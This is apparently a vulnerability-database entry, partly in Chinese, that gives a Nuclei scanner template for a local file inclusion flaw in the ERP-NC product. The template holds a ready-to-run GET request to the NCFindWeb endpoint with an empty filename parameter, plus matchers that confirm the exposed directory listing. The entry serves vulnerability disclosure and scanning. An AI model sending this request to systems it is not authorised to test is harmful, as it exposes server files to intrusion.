erp-nc-directory-traversal: ERP-NC - Local File Inclusion

日期: 2025-08-01 | 影响软件: ERP NC | POC: 已公开

漏洞描述

ERP-NC is vulnerable to local file inclusion.

PoC代码[已公开]

id: erp-nc-directory-traversal

info:
  name: ERP-NC - Local File Inclusion
  author: pikpikcu
  severity: high
  description: ERP-NC is vulnerable to local file inclusion.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,erp-nc,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Client"
          - "ncwslogin.jsp"
          - "admin.jsp"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bbbe3f6ba019178fa00b63465ddaaa1b75b537b6cf1e8e8e812521ed62c7067a0221008de034089c287f1dc1c83fbe55014113ff0d586ec65f5d8f3dcbc98b7fa08539:922c64590222798bb761d5b6d8e72950

相关漏洞推荐